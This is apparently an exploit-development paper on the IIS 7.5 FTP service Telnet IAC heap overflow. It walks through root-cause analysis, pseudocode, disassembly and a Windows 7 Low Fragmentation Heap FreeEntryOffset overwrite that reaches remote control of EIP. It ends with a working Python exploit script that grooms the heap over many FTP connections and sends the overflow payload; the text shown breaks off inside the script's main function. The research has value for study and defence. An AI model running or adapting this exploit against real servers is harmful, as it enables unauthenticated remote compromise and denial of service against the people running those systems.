+ACTIONABLE_HEAP_CORRUPTION_heap_failure_freelists_corruption
+
+DEFAULT_BUCKET_ID:
+ACTIONABLE_HEAP_CORRUPTION_heap_failure_freelists_corruption
+
+STACK_TEXT:
+77f474cb ntdll!RtlpCoalesceFreeBlocks+0x3c9
+77f12eed ntdll!RtlpFreeHeap+0x1f4
+77f12dd8 ntdll!RtlFreeHeap+0x142
+760074d9 KERNELBASE!LocalFree+0x27
+72759c59 IISUTIL!BUFFER::FreeMemory+0x14
+724ba6e3 ftpsvc!FTP_COMMAND::WriteResponseAndLog+0x8f
+724beff8 ftpsvc!FTP_COMMAND::Process+0x243
+724b6051 ftpsvc!FTP_SESSION::OnReadCommandCompletion+0x3e2
+724b76c7 ftpsvc!FTP_CONTROL_CHANNEL::OnReadCommandCompletion+0x1e4
+724b772a ftpsvc!FTP_CONTROL_CHANNEL::AsyncCompletionRoutine+0x17
+7248f182 ftpsvc!FTP_ASYNC_CONTEXT::OverlappedCompletionRoutine+0x3c
+724a56e6 ftpsvc!THREAD_POOL_DATA::ThreadPoolThread+0x89
+724a58c1 ftpsvc!THREAD_POOL_DATA::ThreadPoolThread+0x24
+724a4f8a ftpsvc!THREAD_MANAGER::ThreadManagerThread+0x42
+76bf1194 kernel32!BaseThreadInitThunk+0xe
+77f1b495 ntdll!__RtlUserThreadStart+0x70
+77f1b468 ntdll!_RtlUserThreadStart+0x1b
+
+While simple write-4 primitives have been extinct since the Windows XP SP2
+days [1], there was a feeling that currently known, but previously unproven
+techniques could be leveraged to gain code execution. Adding fuel to the
+fire was a statement from Microsoft stating that the issue "is a Denial of
+Service vulnerability and remote code execution is unlikely" [4].
+
+With the wheels set in motion, it was time to figure out the vulnerability,
+gather exploitation primitives, and subvert the flow of execution by any
+means necessary...
+
+
+--[ 3 - The Vulnerability
+
+The first order of business was to figure out the root cause of the
+vulnerability. Understanding the root cause of the vulnerability was
+integral into forming a more refined and concise proof of concept that
+would serve as a foundation for exploit development.
+
+As stated in the TechNet article, the flaw stemmed from an issue when
+processing Telnet IAC codes [5]. The IAC codes permit a Telnet client to
+tell the Telnet server various commands within the session. The 0xFF
+character denotes these commands. TechNet also describes a process that
+requires the 0xFF characters to be 'escaped' when sending a response by
+adding an additional 0xFF character.
+
+Now that there is context around the vulnerability, the corresponding crash
+dump can be further analyzed. Afterwards we can open the binary in
+IDA Pro and attempt to locate the affected code.  Unfortunately, after
+statically cross-referencing the function calls from the stack trace, there
+didn't seem to be any functions that performed actions on Telnet IAC codes.
+While breakpoints could be set on any of the functions in the stack trace,
+another path was taken.
+
+Since the public symbols named most of the important functions within the
+ftpsvc module, it was deemed more useful to search the function list than
+set debugger breakpoints. A search was made for any function starting with
+'TELNET', resulting in 'TELNET_STREAM_CONTEXT::OnReceivedData' and
+'TELNET_STREAM_CONTEXT::OnSendData'. The returned results proved to be
+viable after some quick dynamic analysis when sending requests and
+receiving responses.
+
+The OnReceivedData function was investigated first, since it was the first
+breakpoint that was hit. Essentially the function attempts to locate Telnet
+IAC codes (0xFF), escape them, parse the commands and normalize the
+request. Unfortunately it doesn't account for seeing two consecutive IAC
+codes.
+
+The following is pseudo code for important portions of OnReceivedData:
+
+TELNET_STREAM_CONTEXT::OnReceivedData(char *aBegin,
+                            DATA_STEAM_BUFFER *aDSB, ...)
+{
+    DATA_STREAM_BUFFER *dsb = aDSB;
+    int len = dsb->BufferLength;
+    char *begin = dsb->BufferBegin;
+    char *adjusted = dsb->BufferBegin;
+    char *end = dsb->BufferEnd;
+    char *curr = dsb->BufferBegin;
+
+    if(len >= 3)
+    {
+        //0xF2 == 242 == Data Mark
+        if(begin[0] == 0xFF && begin[1] == 0xFF && begin[2] == 0xF2)
+            curr = begin + 3;
+    }
+
+    bool seen_iac = false;
+    bool seen_subneg = false;
+    if(curr >= end)
+        return 0;
+
+    while(curr < end)
+    {
+        char curr_char = *curr;
+
+        //if we've seen an iac code
+        //look for a corresponding cmd
+        if(seen_iac)
+        {
+            seen_iac = false;
+            if(seen_subneg)
+            {
+                seen_subneg = false;
+                if(curr_char < 0xF0)
+                    *adjusted++ = curr_char;
+            }
+            else
+            {
+                if(curr_char != 0xFA)
+                {
+                    if(curr_char != 0xFF)
+                    {
+                        if(curr_char < 0xF0)
+                        {
+                            PuDbgPrint("Invalid command %c", curr_char)
+
+                            if(curr_char)
+                                *adjusted++ = curr_char;
+                        }
+                    }
+                    else
+                    {
+                        if(curr_char)
+                            *adjusted++ = curr_char;
+                    }
+                }
+                else
+                {
+                    seen_iac = true;
+                    seen_subneg = true;
+                }
+            }
+
+        }
+        else
+        {
+            if(curr_char == 0xFF)
+                seen_iac = true;
+            else
+                if(curr_char)
+                    *adjusted++ = curr_char;
+        }
+
+        curr++;
+    }
+
+    dsb->BufferLength = adjusted - begin;
+    return 0;
+}
+
+The documentation states Telnet IAC codes can be used by: "Either end of a
+Telnet conversation can locally or remotely enable or disable an option".
+The diagram below represents the 3-byte IAC command within the overall
+Telnet connection stream:
+
+0x0                          0x2
+--------------------------------
+[IAC][Type of Operation][Option]
+--------------------------------
+
+Note: The spec should have been referenced before figuring out the
+vulnerability, instead of reading the code and attempting to figure out
+what could go wrong.
+
+Although there is code to escape IAC characters, the function does not
+except to see two consecutive 0xFF characters in a row. Obviously this
+could be a problem, but it didn't appear to contain any code that would
+result in overflow. Thinking about the TechNet article recalled the line
+'error in the response', so the next logical function to examine was
+'OnSendData'.
+
+Shortly into the function it can be seen that OnSendData is looking for
+IAC (0xFF) codes:
+
+.text:0E07F375 loc_E07F375:
+.text:0E07F375      inc     edx
+.text:0E07F376      cmp     byte ptr [edx], 0FFh
+.text:0E07F379      jnz     short loc_E07F37C
+.text:0E07F37B      inc     edi
+.text:0E07F37C
+.text:0E07F37C loc_E07F37C:
+.text:0E07F37C      cmp     edx, ebx
+.text:0E07F37E      jnz     short loc_E07F375 ; count the number
+                                              ; of "0xFF" characters
+
+The following pseudo code represents the integral pieces of OnSendData:
+
+TELNET_STREAM_CONTEXT::OnSendData(DATA_STREAM_BUFFER *dsb)
+{
+    char *begin = dsb->BufferBegin;
+    char *start = dsb->BufferBegin;
+    char *end = dsb->BufferEnd;
+    int len = dsb->BufferLength;
+    int iac_count = 0;
+
+    if(begin + len == end)
+        return 0;
+
+    //do a total count of the IAC codes
+    do
+    {
+        start++;
+        if(*start == 0xFF)
+            iac_count++;
+    }
+    while(start < end);
+
+    if(!iac_count)
+        return 0;
+
+    for(char *c = begin; c != end; *begin++ = *c)
+    {
+        c++;
+        if(*c == 0xFF)
+            *begin++ == 0xFF;
+    }
+
+    return 0;
+}
+
+As you can see, if the function encounters a 0xFF that is NOT separated by
+at least 2-bytes then there is a potential to escape the code more than
+once, which will eventually lead to a heap corruption into adjacent memory
+based on the size of the request and amount of IAC codes.
+
+For example, if you were to send the string
+"\xFF\xBB\xFF\xFF\xFF\xBB\xFF\xFF" to the server, OnReceivedData produces
+the values:
+
+    1) Before OnReceivedData
+
+        a. DSB->BufferLength = 8
+
+        b. DSB->Buffer = "\xFF\xBB\xFF\xFF\xFF\xBB\xFF\xFF"
+
+    2) After OnReceivedData
+
+        a. DSB->BufferLength = 4
+
+        b. DSB->Buffer = "\xBB\xFF\xBB\xFF"
+
+Although OnReceivedData attempted to escape the IAC codes, it didn't expect
+to see multiple 0xFFs within a certain range; therefore writing the
+illegitimate values at an unacceptable range for OnSendData. Using the same
+string from above, OnSendData would write multiple 0xFF characters past the
+end of the buffer due to de-synchronization in the reading and writing into
+the same buffer.
+
+Now that it is known that a certain amount of 0xFF characters can be
+written past the end of the buffer, it is time to think about an
+exploitation strategy and gather primitives...
+
+
+--[ 4 - Exploitation Primitives
+
+Exploitation primitives can be thought of as the building blocks of exploit
+development. They can be as simple as program functionality that produces a
+desired result or as complicated as a 1-to-n byte overflow. The section
+will cover many of the primitives used within the exploit.
+
+In-depth knowledge of the underlying operating system usually proves to be
+invaluable information when writing exploits. This holds true for the IIS
+FTP exploit, as intricate knowledge of the Windows 7 Low Fragmentation Heap
+served as the basis for exploitation.
+
+It was decided that the FreeEntryOffset Overwrite Technique [2] would be
+used due to the limited ability of the attacker to control the contents of
+the overflow. The attack requires the exploiter to enable the low
+fragmentation heap, position a chunk under the exploiter's control before a
+free chunk (implied same size) within the same UserBlock, write at least 10
+bytes past the end of its buffer, and finally make two subsequent requests
+that are serviced from the same UserBlock. [Yes, it's just that easy ;)]
+
+The following diagram shows how the FreeEntryOffset is utilized when making
+allocations. The first allocation comes from a virgin UserBlock, setting
+the FreeEntryOffset to the first two-byte value stored in the current free
+chunk. Notice there is no validation when updating the FreeEntryOffset. For
+MUCH more information on the LFH and exploitation techniques please see the
+references section:
+
+Allocation 1
+FreeEntryOffset = 0x10
+---------------------------------
+|Header|0x10|      Free         |
+---------------------------------
+|Header|0x20|      Free         |
+---------------------------------
+|Header|0x30|      Free         |
+---------------------------------
+
+Allocation 2
+FreeEntryOffset = 0x20
+---------------------------------
+|Header|           Used         |
+---------------------------------
+|Header|0x20|      Free         |
+---------------------------------
+|Header|0x30|      Free         |
+---------------------------------
+
+Allocation 3
+FreeEntryOffset = 0x30
+---------------------------------
+|Header|           Used         |
+---------------------------------
+|Header|           Used         |
+---------------------------------
+|Header|0x30|      Free         |
+---------------------------------
+
+Now look at the allocation sequence if we have the ability to overwrite a
+FreeEntryOffset with 0xFFFF:
+
+Allocation 1
+FreeEntryOffset = 0x10
+---------------------------------
+|Header|0x10|      Free         |
+---------------------------------
+|Header|0x20|      Free         |
+---------------------------------
+|Header|0x30|      Free         |
+---------------------------------
+
+Allocation 2
+FreeEntryOffset = 0x20
+---------------------------------
+|Header|FFFFFFFFFFFFFFF         |
+---------------------------------
+|Header|FFFF|      Free         |
+---------------------------------
+|Header|0x30|      Free         |
+---------------------------------
+
+Allocation 3
+FreeEntryOffset = 0xFFFF
+---------------------------------
+|Header|           Used         |
+---------------------------------
+|Header|           Used         |
+---------------------------------
+|Header|0x30|      Free         |
+---------------------------------
+
+As you can see, if we can overwrite the FreeEntryOffset with a value of
+0xFFFF then our next allocation will come from unknown heap memory at
+&UserBlock + 8  + (8 * (FreeEntryOffset & 0x7FFF8)) [2]. This may or may
+not point to committed memory for the process, but still provides a good
+starting point for turning a semi-controlled overwrite to a
+fully-controlled overwrite.
+
+
+--[ 5 - Enabling the LFH
+
+If you have read 'Understanding the Low Fragmentation Heap' [2] you'll know
+that it has 'lazy' activation, which means, although it is the default
+front-end allocator, it isn't enabled until a certain threshold is
+exceeded. The most common trigger for enabling the LFH is 16 consecutive
+allocations of the same size.
+
+    for i in range(0, 17):
+        name = "lfh" + str(i)
+        payload = gen_payload(0x40, "X")
+        lfhpool.alloc(name, payload)
+
+You would assume that after making the aforementioned requests
+LFH->HeapBucket[0x40] would be enabled and all further requests for size
+0x40 would be serviced via the LFH; unfortunately this was not the case.
+
+This lead to some memory profiling using Immunity Debugger's '!hippie'
+command. After creating and sending many commands and logging heap
+allocations, a pattern of 0x100 byte allocations emerged. This was quite
+peculiar because requests of 0x40 bytes were being sent. Tracing the
+allocations for 0x100 found that the main consumer of the 0x100 byte
+allocations was FTP_SESSION::WriteResponseHelper; our binary audit can
+finally start!
+
+Note: If some thought would have been put in before brute forcing sizes it
+would have been noted that this is a C++ application which means that
+request data was most likely kept in some buffer or string class; instead
+of being allocated to a specific request size.
+
+Low and behold, looking at the WriteResponseHelper function validated our
+speculation. The function used a buffer class that would allocate 0x100
+bytes and extend itself when necessary:
+
+.text:0E074E7A  mov    eax, [ebp+arg_C] ; dword ptr [eax] == request string
+.text:0E074E7D  push   edi
+.text:0E074E7E  mov    edi, [ebp+arg_8]
+.text:0E074E81  mov    [ebp+vFtpRequest], eax
+.text:0E074E87  mov    esi, 100h
+.text:0E074E8C  push   esi              ; init_size == 0x100
+.text:0E074E8D  lea    eax, [ebp+var_204]
+.text:0E074E93  mov    [ebp+var_27C], ecx
+.text:0E074E99  push   eax
+.text:0E074E9A  lea    ecx, [ebp+var_234]
+.text:0E074EA0  call   ds:STRA::STRA(char *,ulong)
+
+Next, there is a loop to determine if the normalized request string can fit
+in the STRA object:
+
+.text:0E074F59  call   ds:STRA::QuerySize(void)
+.text:0E074F5F  add    eax, eax
+.text:0E074F61  push   eax
+.text:0E074F62  lea    ecx, [ebp+vSTRA1]
+.text:0E074F68  call   ds:STRA::Resize(ulong)
+
+Finally, the STRA object will append the user request data to the server
+response code (for example: "500 "):
+
+.text:0E0750B4  push   [ebp+vFtpRequest]
+.text:0E0750BA  call   ds:STRA::Append(char const *) ; this is where the
+                                                     ; resize happens
+.text:0E0750C0  mov    esi, eax
+.text:0E0750C2  cmp    esi, ebx
+.text:0E0750C4  jl     loc_E07515F     ; if(!STRA::Apend(vFtpRequest))
+                                       ; { destory_objects(); }
+.text:0E0750CA  push   offset SubStr   ; "\r\n"
+.text:0E0750CF  lea    ecx, [ebp+var_234]
+.text:0E0750D5  call   ds:STRA::Append(char const *)
+
+Looking into the STRA:Append(char const*) function, a constant value is
+added when there is not enough space to append to the current STRA object:
+
+.text:6C9DAAE7  cmp    ebx, edx
+.text:6C9DAAE9  ja     short loc_6C9DAB3D ; if enough room, copy
+                                          ; and update size
+.text:6C9DAAEB  jb     short loc_6C9DAAF2 ; otherwise add 0x80
+                                          ; and resize the BUFFER
+.text:6C9DAAED  cmp    [edi+24h], esi
+.text:6C9DAAF0  jnb    short loc_6C9DAB3D
+.text:6C9DAAF2
+.text:6C9DAAF2 loc_6C9DAAF2:
+.text:6C9DAAF2  xor    esi, esi
+.text:6C9DAAF4  cmp    [ebp+arg_C], esi
+.text:6C9DAAF7  jz     short loc_6C9DAB00
+.text:6C9DAAF9  add    eax, 80h        ; eax = buffer.size
+
+Finally the buffer is resized if necessary and the old data is copied over:
+
+.text:6C9DAB1B  push   eax             ; uBytes
+.text:6C9DAB1C  mov    ecx, edi
+.text:6C9DAB1E  call   ?Resize@BUFFER@@QAEHI@Z ; BUFFER::Resize(uint)
+.text:6C9DAB23  test   eax, eax
+.text:6C9DAB25  jnz    short loc_6C9DAB3D
+.text:6C9DAB27  call   ds:__imp_GetLastError
+.text:6C9DAB2D  cmp    eax, esi
+.text:6C9DAB2F  jle    short loc_6C9DAB64
+.text:6C9DAB31  and    eax, 0FFFFh
+.text:6C9DAB36  or     eax, 80070000h
+.text:6C9DAB3B  jmp    short loc_6C9DAB64
+.text:6C9DAB3D
+.text:6C9DAB3D loc_6C9DAB3D:
+.text:6C9DAB3D
+.text:6C9DAB3D  mov    ebx, [ebp+Size]
+.text:6C9DAB40  mov    eax, [edi+20h]
+.text:6C9DAB43  mov    esi, [ebp+arg_8]
+.text:6C9DAB46  push   ebx             ; Size
+.text:6C9DAB47  push   [ebp+Src]       ; Src
+.text:6C9DAB4A  add    eax, esi
+.text:6C9DAB4C  push   eax             ; Dst
+.text:6C9DAB4D  call   memcpy
+
+Now that it is known buffers will be sized in multiples of 0x80 (i.e.
+0x100, 0x180, 0x200, etc), the LFH can be activated accordingly (by size).
+The size of 0x180 was chosen because 0x100 is used for most, if not all,
+initial responses, but _any_ valid size could be used.
+
+    for i in range(0, LFHENABLESIZE):
+        name = "lfh" + str(i)
+        payload = gen_payload(0x180, "X")
+        lfhpool.alloc(name, payload)
+
+
+--[ 6 - FreeEntryOffset Overwrite
+
+It has already been verified that the vulnerability results in an overflow
+of 0xFF characters into an adjacent heap chunk. Therefore the ability to
+enable the LFH for a certain size results in the trivial overwriting of an
+adjacent FreeEntryOffset.
+
+For this exploitation technique to work, the LFH must be enabled while
+ensuring that the UserBlock maintains a few free chunks to service requests
+necessary for exploitation.
+
+Fortunately, this was quite easy to guarantee while on a single core
+machine:
+
+    for i in range(0, LFHENABLESIZE):
+        name = "lfh" + str(i)
+        payload = gen_payload(0x180, "X")
+        lfhpool.alloc(name, payload)
+
+    print "[*] Sending overflow payload"
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((HOST, PORT))
+    data = s.recv(1024)
+
+    buf = "\xff\xbb\xff\xff" * 112 + "\r\n" #ends up allocation 0x180
+                                            #(0x188 after chunk header)
+
+    print "[*] Sending %d 0xFFs in the whole payload" % countff(buf)
+    print "[*] Sending Payload...(%d bytes)" % len(buf)
+    analyze(buf)
+    s.send(buf)
+    s.close()
+
+These small portions of code are enough to enable the LFH and overwrite a
+free adjacent chunk after the overflow-able piece of memory. Now when
+subsequent allocations are made for 0x180 bytes, a bad free entry offset
+will be used, providing the application with unexpected memory for
+appending the response.
+
+The above describes the following:
+
+FreeEntryOffset = 0x1
+0         1           2                3
+[UsedChunk][FreeChunk][OverflowedChunk][FreeChunk]
+.
+.
+.
+[UnknownMemory @ UserBlock + (0xFFFF * 8)]
+
+Three subsequent allocations will accomplish the following:
+
+    1) Allocate FreeChunk at FreeEntryOffset 0x1
+
+    2) Allocate OverflowedChunk (which is also free) updating
+       the FreeEntryOffset to 0xFFFF
+
+    3) Allocate memory at UserBlock + 0xFFFF (instead of offset 0x3)
+
+This means the bad FreeEntryOffset will result in data being completely
+controlled by the attacker.
+
+Note: Although quite easily achieved on a single-core machine, heap
+determinism can be much harder on a multi-core platform. Determinism can
+be much more difficult because each core will effectively have its own
+UserBlocks, making chunk placement dependent on which thread services
+a request. While a multi-core machine doesn't make this vulnerability
+completely un-exploitable it does increase the difficulty and decrease
+the reliability.
+
+Overwriting the FreeEntryOffset with 0xFFFF has turned a limited heap
+overflow into a write-n, fully controlled overflow; since the heap chunk
+allocated will be 100% populated with user-controlled data. There is only
+one HUGE problem. What should be overwritten? This ended up being the most
+challenging and least reliable portion of the exploit and could still be
+further refined.
+
+
+--[ 7 - The Impossible
+
+In all honesty, the previous few steps were basic vulnerability analysis,
+rudimentary Python and requisite knowledge of Windows 7 heap internals. The
+most difficult and time consuming-portion is explained below.
+
+The techniques described below had varying degrees of reliability and might
+not even be the best choice for exploitation. The most valuable knowledge
+to take away will be the process of finding an object to overwrite and
+seeding those objects remotely within the heap.
+
+As stated previously, figuring out WHAT to overwrite is quite a problem.
+Not only does a sufficient object, function, or variable, need to be
+unearthed but that item needs to reside in memory where the 'bad'
+allocation points to.
+
+A starting point for locating what to overwrite began with the functions'
+list. The function list was chosen because public symbols were available,
+providing descriptive names for the most important functions. Also, since
+the application was written in C++ it was assumed that there would be
+virtual functions that stored function pointers somewhere in memory.
+
+The first noticeable item that looked redeeming was FTP_COMMAND class. The
+class will most certainly be instantiated when receiving new commands and
+also contains a vtable.
+
+.text:0E073B7D public: __thiscall FTP_COMMAND::FTP_COMMAND(void) proc near
+.text:0E073B7D  mov    edi, edi
+.text:0E073B7F  push   ebx
+.text:0E073B80  push   esi
+.text:0E073B81  mov    esi, ecx
+.text:0E073B83  push   edi
+.text:0E073B84  lea    ecx, [esi+0Ch]
+.text:0E073B87  mov    dword ptr [esi], offset const FTP_COMMAND::`vftable'
+
+It also contained a function pointer that had the same name as one in our
+stack trace, albeit in a different class.
+
+.text:0E073C8D  mov    dword ptr [ebx+8],
+            offset FTP_COMMAND::AsyncCompletionRoutine(FTP_ASYNC_CONTEXT *)
+
+Note: If the stack trace would have been examined more thoroughly, it would
+have been obvious that this wasn't the correct choice, as you will see
+below.
+
+At first glance this seemed to be the perfect fit. A breakpoint was set in
+ntdll!RtlpLowFragHeapAllocFromContext() after the initial overflow had
+occurred and appeared to be populated with FTP_COMMAND objects!
+Unfortunately, there didn't seem to be a remote command that could trigger
+a virtual function call within the FTP_COMMAND object at the time of an
+attacker's choosing.
+
+Note: Although summed up in one paragraph, this actually took quite some
+time to figure out, as the ability to overwrite a function pointer severely
+clouded judgment.
+
+Failure led to flailing around in an attempt to populate heap memory with
+objects that were remotely user-controlled without authentication.
+Eventually, the thought of each FTP_COMMAND having a specific session came
+to mind. The FTP_SESSION class was more closely examined (which was also in
+the stack trace; although this stack trace would eventually change with
+different heap layouts).
+
+The real question was 'Can this function be reliably triggered at given
+time X with user input Y?' Some testing took place and indeed, this server
+was truly asynchronous ;). FTP, being a lined based protocol, requires an
+end of line / end of command delimiter. The server will actually wait to
+process the command until it has received the entire line [6].
+
+Perhaps a FTP_SESSION object that is associated with a FTP_COMMAND could be
+overwritten, leading to control of a virtual function call. Step tracing
+was used throughout FTP_COMMAND::WriteResponseWithErrorTextAndLog and ended
+up at the FTP_SESSION::Log() function. This function contained multiple
+virtual function calls such as:
+
+.text:0E0761C4      mov     ecx, [edi+3D8h]
+.text:0E0761CA      lea     eax, [ebp+var_1B4]
+.text:0E0761D0      push    eax             ; int
+.text:0E0761D1      push    [ebp+dwFlags]   ; CodePage
+.text:0E0761D7      mov     eax, [ecx]
+.text:0E0761D9      call    dword ptr [eax+18h]
+
+Now that there is a potential known function pointer in memory to be
+overwritten, how can it be called? Surprisingly it was quite simple. By
+leaving the trailing '\n' off the end of a command, setting up the heap,
+and then sending the end of line delimiter, a call to "call dword ptr
+[eax+18h]" with full control of EAX could be triggered.
+
+0:006> r
+eax=43434343 ebx=013f2a60 ecx=0145dc98 edx=0104f900 esi=013dfb98
+edi=013f2a60
+eip=70b661d9 esp=0104f690 ebp=0104f984 iopl=0       nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000   efl=00010246
+ftpsvc!FTP_SESSION::Log+0x16b:
+70b661d9 ff5018     call    dword ptr [eax+18h] ds:0023:4343435b=????????
+
+0:006> k
+ChildEBP RetAddr
+0104f984 70b6a997 ftpsvc!FTP_SESSION::Log+0x16b
+0104fa30 70b6ee86
+ftpsvc!FTP_COMMAND::WriteResponseWithErrorTextAndLog+0x188
+0104fa48 70b66051 ftpsvc!FTP_COMMAND::Process+0xd1
+0104fa88 70b676c7 ftpsvc!FTP_SESSION::OnReadCommandCompletion+0x3e2
+0104faf0 70b6772a ftpsvc!FTP_CONTROL_CHANNEL::OnReadCommandCompletion+0x1e4
+0104fafc 70b3f182 ftpsvc!FTP_CONTROL_CHANNEL::AsyncCompletionRoutine+0x17
+0104fb08 70b556e6 
+ftpsvc!FTP_ASYNC_CONTEXT::OverlappedCompletionRoutine+0x3c
+
+Tracing the function during non-exploitation attempts revealed that the
+function was attempting to get the username (if one existed) for logging
+purposes.
+
+1b561d9 ff5018      call    dword ptr [eax+18h]
+        ds:0023:71b23a38={ftpsvc!USER_SESSION::QueryUserName (71b37823)}
+
+Note: Again, this wasn't directly obvious by looking at the function. There
+was quite a bit of static and dynamic analysis to determine the function's
+usefulness.
+
+Although the ability to spray the heap with FTP_COMMAND and FTP_SESSION
+objects is possible, it is not as reliable as originally expected. Many
+factors such as number of connections, the low fragmentation heap setup
+(i.e. number of cores on the server) and many others come into play when
+attempting to exploit this vulnerability.
+
+For example, the amount of LFH chunks and the number of connections to the
+server ended up having quite an effect on the reliability of the exploit,
+which hovered around 60%. These both contributed to which address the
+misaligned allocation pointed and the contents of the memory.
+
+
+--[ 8 - Conclusion
+
+Although Microsoft and many others claimed that this vulnerability would be
+impossible to exploit for code execution, this paper shows that with the
+correct knowledge and enough determination, impossible turns to difficult.
+
+To recap the exploitation process:
+
+    1) Figure out the vulnerability
+
+    2) Familiarize oneself with how heap memory is managed
+
+    3) Obtain in-depth knowledge of the operating system's memory managers
+
+    4) Prime the LFH to a semi-deterministic state
+
+    5) Send a request to overflow an adjacent chunk on the LFH
+
+    6) Create numerous connections in an attempt to populate the heap with
+       FTP_SESSION objects; which will create USER_SESSION objects as well
+
+    7) Send an unfinished request on the previously created connections
+
+    8) Make 3 allocations from the LFH for same size as your overflowable
+       chunk
+
+        a. 1st == Allocate and overflow into next chunk
+
+        b. 2nd == FreeEntryOffset will be set to 0xFFFF
+
+        c. 3rd == Allocation will (hopefully) point to memory which points
+           to a FTP_SESSION object containing a USER_SESSION class;
+           completely overwriting the function pointer in memory
+
+    9) Finish the command from the connection pool by sending a trailing
+       '\n', which in turn calls the OverlappedCompletionRoutine(),
+       therefore calling the FTP_SESSION::Log() function in the process
+
+    10) This will obtain EIP with multiple registers pointing to
+        user-controlled data. From there ASLR and DEP will need to be
+        subverted to gain code execution. Take a look at
+        DATA_STREAM_BUFFER.Size, which will determine how many bytes are
+        sent back to a user in a response
+
+Although full arbitrary code execution wasn't achieved in the exploit, it
+still proves that a remote attacker can potentially gain control over EIP
+via a remote unauthenticated FTP connection that can be used to subvert the
+security posture of the entire system, instead of limiting the scope to a
+denial of service.
+
+The era of simple exploitation is behind us and more exploitation
+primitives must be used when developing modern exploits. By having a strong
+foundation of operating system knowledge and exploitation techniques, you,
+too, can turn impossible bugs into exploitable ones.
+
+
+--[ 9 - References
+
+[1] - Preventing the exploitation of user mode heap corruption
+      vulnerabilities
+      (http://blogs.technet.com/b/srd/archive/2009/08/04/preventing-the-
+       exploitation-of-user-mode-heap-corruption-vulnerabilities.aspx)
+
+[2] - Understanding the Low Fragmentation Heap
+      (http://illmatics.com/Understanding_the_LFH.pdf)
+
+[3] - Windows 7 IIS 7.5 FTPSVC Denial Of Service
+      (http://packetstormsecurity.org/files/96943/
+       Windows-7-IIS-7.5-FTPSVC-Denial-Of-Service.html)
+
+[4] - Assessing an IIS FTP 7.5 Unauthenticated Denial of Service
+      Vulnerability
+      (http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-
+       ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx)
+
+[5] - The Telnet Protocol
+      (http://support.microsoft.com/kb/231866)
+
+[6] - Synchronization and Overlapped Input and Output
+      (http://msdn.microsoft.com/en-us/library/windows/desktop/
+       ms686358(v=vs.85).aspx)
+
+
+--[ 10 - Exploit (thing.py)
+
+
+import socket, sys, os, time
+
+#Connection Info
+HOST = "192.168.11.129"
+PORT = 21
+WAITP = 1
+
+#Good Combo (60% reliability)
+#LFHENABLESIZE = 0x78
+#CONNCOUNT = 0x103
+#=> FTP_SESSION::Log+0x16B
+#call    dword ptr [eax+18h]  ds:0023:2424243c=????????
+
+#The number of allocations to enabled the LFH for our chosen size
+LFHENABLESIZE = 0x78
+LFHPOOLSIZE = LFHENABLESIZE + 0x3
+
+#Each connection will create X amount of FTP_SESSION objects, which
+#contain the virtual function we're trying to overwrite.
+CONNCOUNT = 0x103
+
+class SoftAlloc:
+    s = 0
+
+    #Notice that the connection doesn't do a 'self.s.recv()'
+    #This is a way to restrict un-needed calls to the completionroute
+    def setup(self):
+        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        self.s.connect((HOST, PORT))
+
+    def alloc(self, data):
+        self.s.send(data)
+
+    def complete(self):
+        self.buf = self.s.recv(1024)
+
+    def free(self):
+        self.s.close()
+
+#Pools are just a way to keep track of connections
+#It could have just as easily been an array of sockets
+class SoftLeak:
+
+    def __init__(self):
+        self.stag = {}
+        self.untagged = []
+
+    def create_pool(self, num):
+        for i in range(0, num):
+            sa = SoftAlloc()
+            sa.setup()
+            self.untagged.append(sa)
+
+    def clear_pool(self):
+        while(len(self.untagged) > 0):
+            sa = self.untagged.pop()
+            sa.free()
+
+    def alloc(self, tag, payload):
+        if tag in self.stag:
+            print "Error: Tag in use %s\n" % tag
+            sys.exit()
+
+        if len(self.untagged) > 0:
+            sa = self.untagged.pop()
+            self.stag[tag] = sa
+            sa.alloc(payload)
+
+    def realloc(self, tag, payload):
+        if tag in self.stag:
+
+            sa = self.stag[tag]
+            sa.alloc(payload)
+
+    def complete(self, tag):
+        if tag in self.stag:
+            sa = self.stag[tag]
+            sa.complete()
+
+    def free(self, tag):
+        if tag not in self.stag:
+            print "Error: Unknown tag %s\n" % tag
+            sys.exit()
+
+        sa = self.stag[tag]
+        del self.stag[tag]
+        sa.free()
+
+def countff(payload):
+
+    count = 0
+    for x in payload:
+        if x == "\xff" or x == "\xFF":
+            count += 1
+
+    return count
+
+def analyze(payload):
+
+    if len(payload) < 0x100:
+        return
+
+    first = payload[0:0x100]
+    first_ffs = countff(first)
+    print "[*] Sending %d 0xFFs in the 1st chunk" % first_ffs
+
+    second = payload[0x100:]
+    second_ffs = countff(second)
+    print "[*] Sending %d 0xFFs in the 2nd chunk" % second_ffs
+
+#allocations have 0x80 added to them, making sizes < 0x81 hard to allocate
+def gen_payload(size, ch):
+    if size < 0x80:
+        print "Invalid allocation size"
+        sys.exit(1)
+
+    if size > 0x180 and size < 0x200:
+        print "WARNING: Only allocating 0x180 bytes"
+
+    new_size = size - 0x80
+    #print "Payload will be %d bytes" % (new_size)
+    return (ch * new_size)
+
+def main():
+
+    #create the initial amount of connections
+    print "[*] Creating LFHPOOL"
+    lfhpool = SoftLeak()
+    lfhpool.create_pool(LFHPOOLSIZE)
+    time.sleep(WAITP)
+
+    ######################################################################
+    #Go through LFHENABLESIZE connections, and make an allocation of a 
+    #certain size. This will enable the LFH for size provided in 
+    #'gen_payload()'
+    ######################################################################
+    for i in range(0, LFHENABLESIZE):
+        name = "lfh" + str(i)
+        payload = gen_payload(0x180, "X")
+        lfhpool.alloc(name, payload)
+
+    #######################################################################
+    #Send out exploit payload, this should be of the same subsegment as the
+    #chunks we put in the LFH. It will write 0xFFs over the FreeEntryOffset
+    #stored in the 1st two bytes of a free chunk in the LFH
+    #Note: Although it actually sends a payload of 0x1C0, it will only 
+    #allocate 0x180 bytes of data to be used for this transaction
+    #Note2: This LFH chunk will be freed, hence in the section below 
+    #requiring 3 allocations instead of the two necessary for the 
+    #FreeEntryOffset overwrite
+    #######################################################################
+    print "[*] Sending overflow payload"
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((HOST,PORT))
+    data = s.recv(1024)
+    buf = "\xff\xbb\xff\xff" * 112 + \
+      "\r\n" #ends up allocation 0x180 (0x188 after chunk header)
+    print "[*] Sending %d 0xFFs in the whole payload" % countff(buf)
+    print "[*] Sending Payload...(%d bytes)" % len(buf)
